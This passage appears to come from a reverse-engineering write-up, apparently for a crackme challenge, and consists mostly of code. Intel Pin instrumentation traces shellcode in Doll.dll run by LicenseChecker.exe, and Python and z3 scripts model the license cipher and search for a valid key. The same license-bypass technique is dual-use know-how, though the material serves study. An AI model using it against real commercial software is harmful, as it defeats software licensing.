PIN_SetThreadData(g_tls, td, tid);
}

static VOID ThreadFini(THREADID tid, const CONTEXT*, INT32, VOID*) {
TData* td = GetTD(tid);
if (td) delete td;
}

static VOID VA_Before(THREADID tid, ADDRINT, ADDRINT dwSize, ADDRINT, ADDRINT) {
TData* td = GetTD(tid);
if (!td) return;
td->last_va_size = dwSize;
}

static VOID VA_After(THREADID tid, ADDRINT ret) {
TData* td = GetTD(tid);
if (!td) return;
td->last_va_base = ret;
}

static VOID EnterShellcode(THREADID tid, ADDRINT shell_entry) {
TData* td = GetTD(tid);
if (!td) return;

td->in_sc = true;
td->last_seen_rcx = UINT64(-1);
td->last_valid_rcx = 0;
td->has_valid = false;

if (td->last_va_base == shell_entry && td->last_va_size > 0) {
td->sc_lo = td->last_va_base;
td->sc_hi = td->last_va_base + td->last_va_size;
} else {
td->sc_lo = shell_entry;
td->sc_hi = shell_entry + 0x200000;
}
}

static ADDRINT ShouldTrack(THREADID tid, ADDRINT ip) {
if (g_done) return 0;
TData* td = GetTD(tid);
if (!td || !td->in_sc) return 0;
if (ip < td->sc_lo || ip >= td->sc_hi) return 0;
return 1;
}

static VOID OnRCX(THREADID tid, ADDRINT rcx) {
if (g_done) return;
TData* td = GetTD(tid);
if (!td) return;

UINT64 v = (UINT64)rcx;
if (v == td->last_seen_rcx) return;
td->last_seen_rcx = v;

const UINT64 sentinel = KnobSentinel.Value();
const UINT32 minDigits = KnobMinHexDigits.Value();

if (v == sentinel) {
PIN_GetLock(&g_lock, 0);
if (!g_done && g_fp) {
g_done = true;
if (td->has_valid) {
std::fprintf(g_fp, "0x%016llX\n", (unsigned long long)td->last_valid_rcx);
} else {
std::fprintf(g_fp, "0x0000000000000000\n");
}
std::fflush(g_fp);
}
PIN_ReleaseLock(&g_lock);

PIN_ExitApplication(0);
return;
}
if (HexDigits(v) >= minDigits) {
td->last_valid_rcx = v;
td->has_valid = true;
}
}

static VOID ImageLoad(IMG img, VOID*) {
std::string name = ToLower(IMG_Name(img));

RTN va = RTN_FindByName(img, "VirtualAlloc");
if (RTN_Valid(va)) {
RTN_Open(va);
RTN_InsertCall(va, IPOINT_BEFORE, (AFUNPTR)VA_Before,
IARG_THREAD_ID,
IARG_FUNCARG_ENTRYPOINT_VALUE, 0,
IARG_FUNCARG_ENTRYPOINT_VALUE, 1,
IARG_FUNCARG_ENTRYPOINT_VALUE, 2,
IARG_FUNCARG_ENTRYPOINT_VALUE, 3,
IARG_END);
RTN_InsertCall(va, IPOINT_AFTER, (AFUNPTR)VA_After,
IARG_THREAD_ID,
IARG_FUNCRET_EXITPOINT_VALUE,
IARG_END);
RTN_Close(va);
}

if (name.find("doll.dll") != std::string::npos) {
ADDRINT base = IMG_LowAddress(img);
g_callsite = base + (ADDRINT)KnobCallRva.Value();
}
}

static VOID Instruction(INS ins, VOID*) {
if (g_callsite != 0 && INS_Address(ins) == g_callsite) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)EnterShellcode,
IARG_THREAD_ID,
IARG_REG_VALUE, REG_RSI,
IARG_END);
}
INS_InsertIfCall(ins, IPOINT_BEFORE, (AFUNPTR)ShouldTrack,
IARG_THREAD_ID,
IARG_INST_PTR,
IARG_END);
INS_InsertThenCall(ins, IPOINT_BEFORE, (AFUNPTR)OnRCX,
IARG_THREAD_ID,
IARG_REG_VALUE, REG_RCX,
IARG_END);
}

static VOID Fini(INT32, VOID*) {
PIN_GetLock(&g_lock, 0);
if (!g_done && g_fp) {
std::fprintf(g_fp, "0x0000000000000000\n");
std::fflush(g_fp);
}
PIN_ReleaseLock(&g_lock);
if (g_fp) std::fclose(g_fp);
}

int main(int argc, char* argv[]) {
PIN_InitSymbols();
if (PIN_Init(argc, argv)) return 1;
g_tls = PIN_CreateThreadDataKey(nullptr);
PIN_InitLock(&g_lock);
g_fp = std::fopen(KnobOut.Value().c_str(), "wb");
if (!g_fp) return 2;
IMG_AddInstrumentFunction(ImageLoad, nullptr);
INS_AddInstrumentFunction(Instruction, nullptr);
PIN_AddThreadStartFunction(ThreadStart, nullptr);
PIN_AddThreadFiniFunction(ThreadFini, nullptr);
PIN_AddFiniFunction(Fini, nullptr);
PIN_StartProgram();
return 0;
}

Python script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
# -*- coding: utf-8 -*-

import os
import re
import json
import time
import subprocess
from pathlib import Path
from datetime import datetime

PIN_CMD = ["pin", "-t", "Dump.dll", "--", "LicenseChecker.exe"]
WORKDIR = os.getcwd()

INPUT_PATH = os.path.join(WORKDIR, "license.bin")
RCX_PATH = os.path.join(WORKDIR, "rcx_result.txt")
OUT_PATH = os.path.join(WORKDIR, "rcx_table.jsonl")

BASE_BYTE = 0xAA
TAIL_BYTE = 0xEE
HEAD_LEN = 8
TAIL_LEN = 24
MAX_RETRY = 3
PIN_TIMEOUT = 30

HEX_RE = re.compile(r"0x([0-9a-fA-F]+)")

def build_input_bytes(head8: bytes) -> bytes:
if len(head8) != HEAD_LEN: raise ValueError("head")
lic = head8 + bytes([TAIL_BYTE]) * TAIL_LEN
if len(lic) != 32: raise ValueError("inp")
if 0 in lic: raise ValueError("inp contains 0x00")
return lic

def write_input(head8: bytes):
lic = build_input_bytes(head8)
with open(INPUT_PATH, "wb") as f: f.write(lic)

def clear_rcx_file(): with open(RCX_PATH, "w", encoding="utf-8") as f: f.write("")

def run_pin_once():
subprocess.run(
PIN_CMD,
cwd=WORKDIR,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
timeout=PIN_TIMEOUT,
check=False)

def parse_rcx_result() -> int:
p = Path(RCX_PATH)
if not p.exists(): raise RuntimeError("rcx_result.txt not exist")
txt = p.read_text(encoding="utf-8", errors="ignore").strip()
if not txt: raise RuntimeError("rcx_result.txt empty")
ms = HEX_RE.findall(txt)
if not ms: raise RuntimeError("rcx_result.txt no hex")
return int(ms[-1], 16)

def run_case_get_rcx(head8: bytes) -> int:
last_err = None
for _ in range(MAX_RETRY):
try:
write_input(head8)
clear_rcx_file()
run_pin_once()
rcx = parse_rcx_result()
return rcx
except Exception as e:
last_err = e
time.sleep(0.05)
raise RuntimeError(f"case fail (retry {MAX_RETRY} times): {last_err}")

def append_record(rec: dict):
line = json.dumps(rec, ensure_ascii=False)
with open(OUT_PATH, "a", encoding="utf-8") as f:
f.write(line + "\n")
f.flush()
os.fsync(f.fileno())

def load_done_set(out_path: str):
done = set()
if not os.path.exists(out_path): return done

with open(out_path, "r", encoding="utf-8", errors="ignore") as f:
for ln, line in enumerate(f, 1):
line = line.strip()
if not line: continue
try:
obj = json.loads(line)
pos = int(obj["pos"])
val = int(obj["val"])
if 0 <= pos < 8 and 1 <= val <= 255: done.add((pos, val))
except Exception: pass
return done

def make_head(base_byte: int, pos: int, val: int) -> bytes:
b = bytearray([base_byte] * 8)
b[pos] = val
return bytes(b)

def fmt_hex16(v: int) -> str: return f"0x{v:016X}"

def main():
total = 8 * 255
done = load_done_set(OUT_PATH)
print(f"[+] Completed: {len(done)}/{total}")
base_head = bytes([BASE_BYTE] * 8)
try:
base_rcx = run_case_get_rcx(base_head)
print(f"[+] baseline(AA*8) rcx = {fmt_hex16(base_rcx)}")
except Exception as e: print(f"[!] baseline read failed: {e}")
start_time = time.time()
finished_now = 0
for pos in range(8):
for val in range(1, 256):
key = (pos, val)
if key in done: continue
head = make_head(BASE_BYTE, pos, val)
try:
rcx = run_case_get_rcx(head)
rec = {
"pos": pos,
"val": val,
"val_hex": f"{val:02X}",
"state_hex": head.hex(),
"input32_hex": (head + bytes([TAIL_BYTE])*24).hex(),
"rcx_hex": fmt_hex16(rcx),
"rcx_le_hex": rcx.to_bytes(8, "little", signed=False).hex(),
"rcx_be_hex": rcx.to_bytes(8, "big", signed=False).hex(),
"ts": datetime.utcnow().isoformat() + "Z",
}
append_record(rec)
done.add(key)
finished_now += 1
done_cnt = len(done)
elapsed = time.time() - start_time
speed = finished_now / elapsed if elapsed > 0 else 0.0
remain = total - done_cnt
eta = remain / speed if speed > 1e-9 else float("inf")
print(
f"[OK] pos={pos} val=0x{val:02X} rcx={fmt_hex16(rcx)} | "
f"progress {done_cnt}/{total} | speed={speed:.2f}/s | eta={eta/60:.1f}m"
)
except Exception as e:
err_rec = {
"pos": pos,
"val": val,
"val_hex": f"{val:02X}",
"state_hex": head.hex(),
"error": str(e),
"ts": datetime.utcnow().isoformat() + "Z",
}
append_record(err_rec)
print(f"[ERR] pos={pos} val=0x{val:02X} -> {e}")
print(f"[+] Finished")

if __name__ == "__main__":
main()

Generate table:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
# -*- coding: utf-8 -*-

import argparse
import json
from collections import Counter
from pathlib import Path
from typing import List, Dict, Tuple, Optional

def A(x): return (x << 4) & 0xFF
def B(x): return x ^ (x >> 4)
def C(x): return x ^ ((x << 2) & 0xFF)
def D(x): return (x << 1) & 0xFF
def E(x): return x ^ ((x << 4) & 0xFF)

def L(state: List[int]) -> List[int]:
s = state
out = [0] * 8
out[0] = A(s[0]) ^ C(s[2]) ^ B(s[3]) ^ D(s[5])
out[1] = B(s[0]) ^ A(s[1]) ^ C(s[3]) ^ D(s[6])
out[2] = C(s[0]) ^ B(s[1]) ^ A(s[2]) ^ D(s[7])
out[3] = C(s[1]) ^ B(s[2]) ^ A(s[3]) ^ D(s[4])
out[4] = D(s[1]) ^ E(s[4]) ^ C(s[6]) ^ B(s[7])
out[5] = D(s[2]) ^ B(s[4]) ^ E(s[5]) ^ C(s[7])
out[6] = D(s[3]) ^ C(s[4]) ^ B(s[5]) ^ E(s[6])
out[7] = D(s[0]) ^ C(s[5]) ^ B(s[6]) ^ E(s[7])
return [x & 0xFF for x in out]

def unpack_le64(v: int) -> List[int]:
return [(v >> (8 * i)) & 0xFF for i in range(8)]

def pack_le(bs: List[int]) -> int:
v = 0
for i, b in enumerate(bs):
v |= (b & 0xFF) << (8 * i)
return v

def xor8(a: List[int], b: List[int]) -> List[int]:
return [(a[i] ^ b[i]) & 0xFF for i in range(8)]

def fmt64(x: int) -> str:
return f"0x{x:016X}"

def expected_state_hex(base_byte: int, pos: int, val: int) -> str:
b = [base_byte] * 8
b[pos] = val
return bytes(b).hex()

def keff_from_state_rcx(state8: List[int], rcx64: int) -> List[int]:
y = unpack_le64(rcx64)
lin = L(state8)
return xor8(y, lin)

def predict_y(state8: List[int], K0: List[int], U: List[List[Optional[List[int]]]]) -> Optional[int]:
ke = K0[:]
for i in range(8):
ui = U[i][state8[i]]
if ui is None:
return None
ke = xor8(ke, ui)
out = xor8(L(state8), ke)
return pack_le(out)

def parse_rcx_hex(obj: dict) -> Optional[int]: return int(str(obj["rcx_hex"]), 16)

def main():
ap = argparse.ArgumentParser()
ap.add_argument("--infile", default="rcx_table.jsonl")
ap.add_argument("--out-prefix", default="model")
ap.add_argument("--base-byte", default="AA")
ap.add_argument("--base-rcx", default="")
args = ap.parse_args()
in_path = Path(args.infile)
base_byte = int(args.base_byte, 16) & 0xFF
base_state_hex = bytes([base_byte] * 8).hex()
rows = []
with in_path.open("r", encoding="utf-8", errors="ignore") as f:
for ln, line in enumerate(f, 1):
line = line.strip()
if not line: continue
obj = json.loads(line)
st_hex = str(obj["state_hex"]).lower()
st = list(bytes.fromhex(st_hex))
rcx = parse_rcx_hex(obj)
pos = obj.get("pos", None)
val = obj.get("val", None)
pos = int(pos) if pos is not None else None
val = int(val) if val is not None else None
rows.append({
"line": ln,
"state": st,
"state_hex": st_hex,
"rcx": rcx,
"pos": pos,
"val": val
})
onehot: Dict[Tuple[int, int], List[int]] = {} # key -> [rcx...]
for r in rows:
st = r["state"]
pos = r["pos"]
val = r["val"]
if pos is None or val is None:
diffs = [i for i in range(8) if st[i] != base_byte]
if len(diffs) == 0:
for p in range(8):
onehot.setdefault((p, base_byte), []).append(r["rcx"])
continue
elif len(diffs) == 1:
p = diffs[0]
v = st[p]
onehot.setdefault((p, v), []).append(r["rcx"])
continue
else:
continue
else:
if not (0 <= pos < 8 and 0 <= val <= 255):
continue
exp = expected_state_hex(base_byte, pos, val)
if r["state_hex"] != exp:
continue
onehot.setdefault((pos, val), []).append(r["rcx"])
raw_rcx: List[List[Optional[int]]] = [[None] * 256 for _ in range(8)]
conflicts = []
for (pos, val), arr in onehot.items():
c = Counter(arr)
rcx_mode, cnt = c.most_common(1)[0]
if len(c) > 1: conflicts.append((pos, val, dict(c)))
raw_rcx[pos][val] = rcx_mode
if args.base_rcx: base_rcx = int(args.base_rcx, 16)
else:
base_candidates = []
for p in range(8):
x = raw_rcx[p][base_byte]
if x is not None: base_candidates.append(x)
c = Counter(base_candidates)
base_rcx = c.most_common(1)[0][0]
base_state = [base_byte] * 8
K0 = keff_from_state_rcx(base_state, base_rcx)
U: List[List[Optional[List[int]]]] = [[None] * 256 for _ in range(8)]
for i in range(8):
U[i][base_byte] = [0] * 8
for v in range(256):
y = raw_rcx[i][v]
if y is None: continue
s = [base_byte] * 8
s[i] = v
ke = keff_from_state_rcx(s, y)
U[i][v] = xor8(ke, K0)
coverage = {}
for i in range(8):
cnt_1_ff = sum(1 for v in range(1, 256) if raw_rcx[i][v] is not None)
cnt_all = sum(1 for v in range(256) if raw_rcx[i][v] is not None)
coverage[i] = {"count_01_ff": cnt_1_ff, "count_00_ff": cnt_all}
total_eval, mismatch = 0, 0
mismatch_examples = []
for r in rows:
st = r["state"]
y_obs = r["rcx"]
y_pred = predict_y(st, K0, U)
if y_pred is None:
continue
total_eval += 1
if y_pred != y_obs:
mismatch += 1
if len(mismatch_examples) < 20:
mismatch_examples.append({
"state_hex": r["state_hex"],
"obs": fmt64(y_obs),
"pred": fmt64(y_pred),
"residual": fmt64(y_obs ^ y_pred),
"line": r["line"]
})
py_path = Path(f"{args.out_prefix}_arrays.py")
with py_path.open("w", encoding="utf-8") as f:
f.write("# Auto-generated\n")
f.write(f"BASE_BYTE = 0x{base_byte:02X}\n")
f.write(f"BASE_RCX = {fmt64(base_rcx)}\n")
f.write(f"K0 = {K0!r}\n")
f.write("U = [\n")
for i in range(8):
f.write(" [\n")
for v in range(256):
f.write(f" {U[i][v]!r},\n")
f.write(" ],\n")
f.write("]\n")
print(f" base_rcx = {fmt64(base_rcx)}")
print(f" K0 = {fmt64(pack_le(K0))}")
for i in range(8):
c1 = coverage[i]['count_01_ff']
c2 = coverage[i]['count_00_ff']
print(f" pos{i}: 01..FF={c1}/255, 00..FF={c2}/256")
print(f" check: eval={total_eval}, mismatch={mismatch}")

if __name__ == "__main__":
main()

The algorithm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
def A(x): return (x << 4) & 0xFF
def B(x): return x ^ (x >> 4)
def C(x): return x ^ ((x << 2) & 0xFF)
def D(x): return (x << 1) & 0xFF
def E(x): return x ^ ((x << 4) & 0xFF)
def T(x):
lo_idx = [3, 0, 1, 2, 7, 4, 5, 6]
Ts = [[0]*8 for _ in range(8)]
To = [0]*8
for i in range(8):
if x[i] < 0x80: Ts[i][(i+4)&7] = 1
if x[i] < 0x40: Ts[i][lo_idx[i]] = 2
if 0x40 <= x[i] < 0x80: Ts[i][lo_idx[i]] = 3
if 0xC0 <= x[i]: Ts[i][lo_idx[i]] = 1
for i in range(8):
for j in range(8): To[j] ^= Ts[i][j]
return To

def L(state):
s = state
out = [0] * 8
out[0] = A(s[0]) ^ C(s[2]) ^ B(s[3]) ^ D(s[5])
out[1] = B(s[0]) ^ A(s[1]) ^ C(s[3]) ^ D(s[6])
out[2] = C(s[0]) ^ B(s[1]) ^ A(s[2]) ^ D(s[7])
out[3] = C(s[1]) ^ B(s[2]) ^ A(s[3]) ^ D(s[4])
out[4] = D(s[1]) ^ E(s[4]) ^ C(s[6]) ^ B(s[7])
out[5] = D(s[2]) ^ B(s[4]) ^ E(s[5]) ^ C(s[7])
out[6] = D(s[3]) ^ C(s[4]) ^ B(s[5]) ^ E(s[6])
out[7] = D(s[0]) ^ C(s[5]) ^ B(s[6]) ^ E(s[7])
return [x & 0xFF for x in out]

def ENC(state_bytes):
state = [x & 0xFF for x in state_bytes]
lin = L(state)
t = T(state)
K0 = [180, 83, 16, 61, 75, 204, 8, 85]
out = [(lin[i] ^ K0[i] ^ t[i]) & 0xFF for i in range(8)]
return out

def pack_le(bs):
v = 0
for i, b in enumerate(bs): v |= (b & 0xFF) << (8 * i)
return v

if __name__ == "__main__":
state = bytearray.fromhex("")
out = ENC(state)
res = pack_le(out)
print("inp =", state.hex())
print(f"res = 0x{res:016X}")

Count shr times:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#include "pin.H"
#include <string>
#include <algorithm>
#include <cstdio>
#include <cctype>

KNOB<std::string> KnobOut(KNOB_MODE_WRITEONCE, "pintool", "o", "shr_num.txt", "output count file");
KNOB<UINT64> KnobCallRva(KNOB_MODE_WRITEONCE, "pintool", "call_rva", "0x120B", "RVA of 'call rsi' in Doll.dll");

static ADDRINT g_callsite = 0;
static PIN_LOCK g_lock;
static UINT64 g_total_shr_rax1 = 0;
struct TData {
bool in_sc = false;
ADDRINT sc_lo = 0, sc_hi = 0;
ADDRINT last_va_base = 0;
ADDRINT last_va_size = 0;
UINT64 shr_cnt = 0;
};

static TLS_KEY g_tls;

static inline std::string ToLower(std::string s) {
std::transform(s.begin(), s.end(), s.begin(), [](unsigned char c){ return (char)std::tolower(c); });
return s;
}

static TData* GetTD(THREADID tid) {
return reinterpret_cast<TData*>(PIN_GetThreadData(g_tls, tid));
}

static VOID ThreadStart(THREADID tid, CONTEXT* /*ctxt*/, INT32 /*flags*/, VOID* /*v*/) {
TData* td = new TData();
PIN_SetThreadData(g_tls, td, tid);
}

static VOID ThreadFini(THREADID tid, const CONTEXT* /*ctxt*/, INT32 /*code*/, VOID* /*v*/) {
TData* td = GetTD(tid);
if (td) {
PIN_GetLock(&g_lock, 1);
g_total_shr_rax1 += td->shr_cnt;
PIN_ReleaseLock(&g_lock);
delete td;
}
}

static VOID VA_Before(THREADID tid, ADDRINT /*lpAddress*/, ADDRINT dwSize, ADDRINT /*flAllocationType*/, ADDRINT /*flProtect*/) {
TData* td = GetTD(tid);
if (!td) return;
td->last_va_size = dwSize;
}

static VOID VA_After(THREADID tid, ADDRINT ret) {
TData* td = GetTD(tid);
if (!td) return;
td->last_va_base = ret;
}

static VOID EnterShellcode(THREADID tid, ADDRINT shell_entry, ADDRINT /*ip*/) {
TData* td = GetTD(tid);
if (!td) return;
td->in_sc = true;
if (td->last_va_base == shell_entry && td->last_va_size > 0) {
td->sc_lo = td->last_va_base;
td->sc_hi = td->last_va_base + td->last_va_size;
} else {
td->sc_lo = shell_entry;
td->sc_hi = shell_entry + 0x200000;
}
}

static VOID ExitShellcode(THREADID tid) {
TData* td = GetTD(tid);
if (!td) return;
td->in_sc = false;
}

static ADDRINT ShouldCount(THREADID tid, ADDRINT ip) {
TData* td = GetTD(tid);
if (!td) return 0;
if (!td->in_sc) return 0;
if (ip < td->sc_lo || ip >= td->sc_hi) return 0;
return 1;
}

static VOID IncShrCount(THREADID tid) {
TData* td = GetTD(tid);
if (!td) return;
td->shr_cnt++;
}

static bool IsShrRax1(INS ins) {
if (INS_Opcode(ins) != XED_ICLASS_SHR) return false;
if (INS_OperandCount(ins) < 1) return false;
if (!INS_OperandIsReg(ins, 0)) return false;
if (INS_OperandReg(ins, 0) != REG_RAX) return false;
if (INS_OperandCount(ins) >= 2) {
if (INS_OperandIsImmediate(ins, 1)) {
ADDRINT imm = INS_OperandImmediate(ins, 1);
return ((imm & 0xFF) == 1);
}
return false;
}
return true;
}

static VOID ImageLoad(IMG img, VOID* /*v*/) {
std::string name = ToLower(IMG_Name(img));
RTN va = RTN_FindByName(img, "VirtualAlloc");
if (RTN_Valid(va)) {
RTN_Open(va);
RTN_InsertCall(va, IPOINT_BEFORE, (AFUNPTR)VA_Before,
IARG_THREAD_ID,
IARG_FUNCARG_ENTRYPOINT_VALUE, 0,
IARG_FUNCARG_ENTRYPOINT_VALUE, 1,
IARG_FUNCARG_ENTRYPOINT_VALUE, 2,
IARG_FUNCARG_ENTRYPOINT_VALUE, 3,
IARG_END);
RTN_InsertCall(va, IPOINT_AFTER, (AFUNPTR)VA_After,
IARG_THREAD_ID,
IARG_FUNCRET_EXITPOINT_VALUE,
IARG_END);
RTN_Close(va);
}
if (name.find("doll.dll") != std::string::npos) {
ADDRINT base = IMG_LowAddress(img);
UINT64 rva = KnobCallRva.Value();
g_callsite = base + (ADDRINT)rva;
}
}

static VOID Instruction(INS ins, VOID* /*v*/) {
if (g_callsite != 0 && INS_Address(ins) == g_callsite) {
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)EnterShellcode,
IARG_THREAD_ID,
IARG_REG_VALUE, REG_RSI,
IARG_INST_PTR,
IARG_END);

if (INS_IsValidForIpointAfter(ins)) {
INS_InsertCall(ins, IPOINT_AFTER, (AFUNPTR)ExitShellcode,
IARG_THREAD_ID,
IARG_END);
}
}
if (IsShrRax1(ins)) {
INS_InsertIfCall(ins, IPOINT_BEFORE, (AFUNPTR)ShouldCount,
IARG_THREAD_ID,
IARG_INST_PTR,
IARG_END);

INS_InsertThenCall(ins, IPOINT_BEFORE, (AFUNPTR)IncShrCount,
IARG_THREAD_ID,
IARG_END);
}
}

static VOID Fini(INT32 /*code*/, VOID* /*v*/) {
FILE* fp = std::fopen(KnobOut.Value().c_str(), "wb");
if (!fp) return;
std::fprintf(fp, "%llu\n", (unsigned long long)g_total_shr_rax1);
std::fclose(fp);
}

int main(int argc, char* argv[]) {
PIN_InitSymbols();
if (PIN_Init(argc, argv)) return 1;
g_tls = PIN_CreateThreadDataKey(nullptr);
PIN_InitLock(&g_lock);
IMG_AddInstrumentFunction(ImageLoad, nullptr);
INS_AddInstrumentFunction(Instruction, nullptr);
PIN_AddThreadStartFunction(ThreadStart, nullptr);
PIN_AddThreadFiniFunction(ThreadFini, nullptr);
PIN_AddFiniFunction(Fini, nullptr);
PIN_StartProgram();
return 0;
}

Autore:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
# -*- coding: utf-8 -*-
import argparse
import json
import re
import subprocess
import time
from pathlib import Path
from typing import Dict, Tuple, Optional, List, Any

from z3 import (
BitVec, BitVecVal, Solver, sat, LShR, ULT, UGE, And, If, Or, Extract
)

K0 = [180, 83, 16, 61, 75, 204, 8, 85]
LO_IDX = [3, 0, 1, 2, 7, 4, 5, 6]

N_QWORDS = 4
BYTES_PER_Q = 8
TOTAL_BYTES = N_QWORDS * BYTES_PER_Q
TOTAL_BITS = TOTAL_BYTES * 8

def bv8(x: int): return BitVecVal(x & 0xFF, 8)
def A_z(x): return (x << 4) & bv8(0xFF)
def B_z(x): return x ^ LShR(x, 4)
def C_z(x): return x ^ ((x << 2) & bv8(0xFF))
def D_z(x): return (x << 1) & bv8(0xFF)
def E_z(x): return x ^ ((x << 4) & bv8(0xFF))

def T_z(state8):
To = [bv8(0) for _ in range(8)]
for i in range(8):
x = state8[i]
idx1 = (i + 4) & 7
idx2 = LO_IDX[i]
cond_lt80 = ULT(x, bv8(0x80))
cond_lt40 = ULT(x, bv8(0x40))
cond_40_80 = And(UGE(x, bv8(0x40)), ULT(x, bv8(0x80)))
cond_geC0 = UGE(x, bv8(0xC0))
To[idx1] = To[idx1] ^ If(cond_lt80, bv8(1), bv8(0))
v2 = If(cond_lt40, bv8(2), If(cond_40_80, bv8(3), If(cond_geC0, bv8(1), bv8(0))))
To[idx2] = To[idx2] ^ v2
return To

def L_z(s):
out = [None] * 8
out[0] = A_z(s[0]) ^ C_z(s[2]) ^ B_z(s[3]) ^ D_z(s[5])
out[1] = B_z(s[0]) ^ A_z(s[1]) ^ C_z(s[3]) ^ D_z(s[6])
out[2] = C_z(s[0]) ^ B_z(s[1]) ^ A_z(s[2]) ^ D_z(s[7])
out[3] = C_z(s[1]) ^ B_z(s[2]) ^ A_z(s[3]) ^ D_z(s[4])
out[4] = D_z(s[1]) ^ E_z(s[4]) ^ C_z(s[6]) ^ B_z(s[7])
out[5] = D_z(s[2]) ^ B_z(s[4]) ^ E_z(s[5]) ^ C_z(s[7])
out[6] = D_z(s[3]) ^ C_z(s[4]) ^ B_z(s[5]) ^ E_z(s[6])
out[7] = D_z(s[0]) ^ C_z(s[5]) ^ B_z(s[6]) ^ E_z(s[7])
return [x & bv8(0xFF) for x in out]

def ENC8_z(state8):
lin = L_z(state8)
t = T_z(state8)
out = [(lin[i] ^ bv8(K0[i]) ^ t[i]) & bv8(0xFF) for i in range(8)]
return out

def build_solver(
fixed_bits: Dict[Tuple[int, int], int],
forbid_zero_input: bool,
printable_only: bool = True,
printable_min: int = 0x20,
printable_max: int = 0x7E,
allowed_charset: Optional[bytes] = None):
s = Solver()
x = [BitVec(f"x{i}", 8) for i in range(TOTAL_BYTES)]
if forbid_zero_input:
for xi in x: s.add(xi != bv8(0))
if allowed_charset is not None:
cs = sorted(set(int(c) & 0xFF for c in allowed_charset))
if not cs: raise ValueError("allowed_charset cannot be empty")
choices = [bv8(c) for c in cs]
for xi in x: s.add(Or(*[xi == c for c in choices]))
elif printable_only:
lo = printable_min & 0xFF
hi = printable_max & 0xFF
for xi in x:
s.add(UGE(xi, bv8(lo)))
s.add(ULT(xi, bv8(hi + 1)))
y_blocks = []
for q in range(N_QWORDS):
st = x[q * 8:(q + 1) * 8]
y_blocks.append(ENC8_z(st))
for (q, bit), v in fixed_bits.items():
if not (0 <= q < N_QWORDS and 0 <= bit < 64):
raise ValueError(f"invalid key {(q, bit)}")
byte_i = bit // 8
